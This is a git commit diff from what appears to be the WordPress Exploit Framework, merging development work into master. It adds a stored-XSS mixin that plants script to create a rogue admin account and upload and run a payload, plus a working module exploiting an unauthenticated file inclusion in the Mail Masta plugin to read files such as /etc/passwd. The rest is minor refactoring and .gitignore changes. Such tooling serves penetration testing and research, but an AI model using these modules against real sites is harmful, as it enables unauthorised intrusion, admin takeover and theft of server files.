Merged development into master

Author: rastating

.gitignore

@@ -92,3 +92,14 @@ sftp-config.json
 # Atom Plugins
 deployment-config.json
 Gemfile.lock
+
+# NPM
+node_modules/
+npm-debug.log
+
+# TypeScript type defs
+typings/
+
+# Compiled Angular TypeScript
+lib/web/public/app/**/*.js
+lib/web/public/app/**/*.map

lib/wpxf/core.rb

@@ -29,6 +29,7 @@
 require 'wpxf/wordpress/xss'
 require 'wpxf/wordpress/reflected_xss'
 require 'wpxf/wordpress/staged_reflected_xss'
+require 'wpxf/wordpress/stored_xss'
 require 'wpxf/wordpress/shell_upload'
 require 'wpxf/wordpress/file_download'
 

lib/wpxf/net/http_response.rb

@@ -15,7 +15,7 @@ def parse_typhoeus_response(res)
         self.body = res.body.nil? ? '' : res.body
         self.headers = res.headers
         self.timed_out = res.timed_out? || res.return_code == :couldnt_connect
-        self.cookies = CookieJar.new.parse(res.headers['Set-Cookie'])
+        self.cookies = CookieJar.new.parse(res.headers['Set-Cookie']) if res.headers
       end
 
       # @return [Boolean] a boolean that indicates whether a request timed out.

lib/wpxf/wordpress/reflected_xss.rb

@@ -17,7 +17,7 @@ def initialize
   # @return [Boolean] true if successful.
   def run
     unless respond_to? 'url_with_xss'
-      fail 'Required method "url_with_xss" has not been implemented'
+      raise 'Required method "url_with_xss" has not been implemented'
     end
 
     return false unless super

lib/wpxf/wordpress/shell_upload.rb

@@ -75,6 +75,13 @@ def run
     true
   end
 
+  # Execute the payload at the specified address.
+  # @param payload_url [String] the payload URL to access.
+  def execute_payload(payload_url)
+    res = execute_get_request(url: payload_url, cookie: @session_cookie)
+    emit_success "Result: #{res.body}" if res && res.code == 200 && !res.body.strip.empty?
+  end
+
   private
 
   def payload_name_length
@@ -100,9 +107,4 @@ def upload_payload(builder)
 
     true
   end
-
-  def execute_payload(payload_url)
-    res = execute_get_request(url: payload_url, cookie: @session_cookie)
-    emit_success "Result: #{res.body}" if res && res.code == 200 && !res.body.strip.empty?
-  end
 end

lib/wpxf/wordpress/stored_xss.rb

@@ -0,0 +1,56 @@
+# Provides reusable functionality for stored XSS modules.
+module Wpxf::WordPress::StoredXss
+  include Wpxf::WordPress::Xss
+
+  # Initialize a new instance of {StoredXss}.
+  def initialize
+    super
+    @success = false
+    @info[:desc] = 'This module stores a script in the target system that '\
+                   'will execute when an admin user views the vulnerable page, '\
+                   'which in turn, will create a new admin user to upload '\
+                   'and execute the selected payload in the context of the '\
+                   'web server.'
+  end
+
+  # @return [String] the URL or name of the page an admin user must view to execute the script.
+  def vulnerable_page
+    'a vulnerable page'
+  end
+
+  # Abstract method which must be implemented to store the XSS include script.
+  # @return [Wpxf::Net::HttpResponse] the HTTP response to the request to store the script.
+  def store_script
+    raise 'Required method "store_script" has not been implemented'
+  end
+
+  # Call #store_script and validate the response.
+  # @return [Boolea] return true if the script was successfully stored.
+  def store_script_and_validate
+    res = store_script
+
+    if res.nil?
+      emit_error 'No response from the target'
+      return false
+    end
+
+    return true if res.code == 200
+
+    emit_error "Server responded with code #{res.code}"
+    false
+  end
+
+  # Run the module.
+  # @return [Boolean] true if successful.
+  def run
+    return false unless super
+
+    emit_info 'Storing script...'
+    return false unless store_script_and_validate
+
+    emit_success "Script stored and will be executed when a user views #{vulnerable_page}"
+    start_http_server
+
+    xss_shell_success
+  end
+end

modules/auxiliary/mail_masta_unauthenticated_local_file_inclusion.rb

@@ -0,0 +1,43 @@
+class Wpxf::Auxiliary::MailMastaUnauthenticatedLocalFileInclusion < Wpxf::Module
+  include Wpxf::WordPress::FileDownload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Mail Masta Unauthenticated Local File Inclusion',
+      author: [
+        'Guillermo Garcia Marcos',         # Disclosure
+        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+      ],
+      desc: 'This module exploits a vulnerability which allows you to include any arbitrary file '\
+            'accessible by the user the web server is running as into the executing script.',
+      references: [
+        ['WPVDB', '8609'],
+        ['EDB', '40290'],
+        ['URL', 'https://cxsecurity.com/issue/WLB-2016080220']
+      ],
+      date: 'Aug 23 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('mail-masta')
+  end
+
+  def working_directory
+    'wp-content/plugins/mail-masta/inc/campaign'
+  end
+
+  def default_remote_file_path
+    '/etc/passwd'
+  end
+
+  def downloader_url
+    normalize_uri(full_uri, working_directory, 'count_of_send.php')
+  end
+
+  def download_request_params
+    { pl: remote_file }
+  end
+end

modules/exploits/ajax_random_post_reflected_xss_shell_upload.rb

@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'AJAX Random Post <= 2.0 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar,',           # Discovery
+        'Larry W. Cashdollar',            # Discovery
         'Rob Carr <rob[at]rastating.com>' # WPXF module
       ],
       references: [

modules/exploits/anti_plagiarism_reflected_xss_shell_upload.rb

@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'Anti Plagiarism <= 3.60 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar,',           # Discovery
+        'Larry W. Cashdollar',            # Discovery
         'Rob Carr <rob[at]rastating.com>' # WPXF module
       ],
       references: [

modules/exploits/defa_online_image_protector_reflected_xss_shell_upload.rb

@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'Defa Online Image Protector <= 3.3 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar,',           # Discovery
+        'Larry W. Cashdollar',            # Discovery
         'Rob Carr <rob[at]rastating.com>' # WPXF module
       ],
       references: [